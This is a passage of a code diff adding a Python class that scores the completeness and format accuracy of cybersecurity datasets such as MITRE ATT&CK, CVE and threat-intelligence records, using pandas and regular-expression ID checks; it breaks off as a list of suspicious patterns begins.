0.85, "max": 1.0}, + "accuracy": {"min": 0.90, "max": 1.0}, + "timeliness": {"min": 0.90, "max": 1.0}, + "relevance": {"min": 0.80, "max": 1.0} + }, + "red_team_logs": { + "completeness": {"min": 0.98, "max": 1.0}, + "consistency": {"min": 0.90, "max": 1.0}, + "validity": {"min": 0.95, "max": 1.0} + } + } + + def measure_completeness(self, data: pd.DataFrame) -> float: + """Measure data completeness (percentage of non-null values)""" + if data.empty: + return 0.0 + + total_cells = data.shape[0] * data.shape[1] + non_null_cells = total_cells - data.isnull().sum().sum() + return non_null_cells / total_cells if total_cells > 0 else 0.0 + + def measure_accuracy(self, data: pd.DataFrame, dataset_type: str) -> float: + """Measure data accuracy based on validation rules""" + if data.empty: + return 0.0 + + accuracy_score = 1.0 + total_checks = 0 + failed_checks = 0 + + # Cybersecurity-specific accuracy checks + if dataset_type == "mitre_attack": + # Check technique ID format + if 'technique_id' in data.columns: + technique_pattern = re.compile(r'^T\d{4}(\.\d{3})?$') + invalid_ids = ~data['technique_id'].str.match(technique_pattern, na=False) + failed_checks += invalid_ids.sum() + total_checks += len(data) + + elif dataset_type == "cve_data": + # Check CVE ID format + if 'cve_id' in data.columns: + cve_pattern = re.compile(r'^CVE-\d{4}-\d{4,}$') + invalid_cves = ~data['cve_id'].str.match(cve_pattern, na=False) + failed_checks += invalid_cves.sum() + total_checks += len(data) + + elif dataset_type == "threat_intel": + # Check IP address format + if 'ip_address' in data.columns: + ip_pattern = re.compile(r'^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$') + invalid_ips = ~data['ip_address'].str.match(ip_pattern, na=False) + failed_checks += invalid_ips.sum() + total_checks += len(data) + + # General accuracy checks + for column in data.select_dtypes(include=['object']).columns: + # Check for suspicious patterns + suspicious_patterns = ['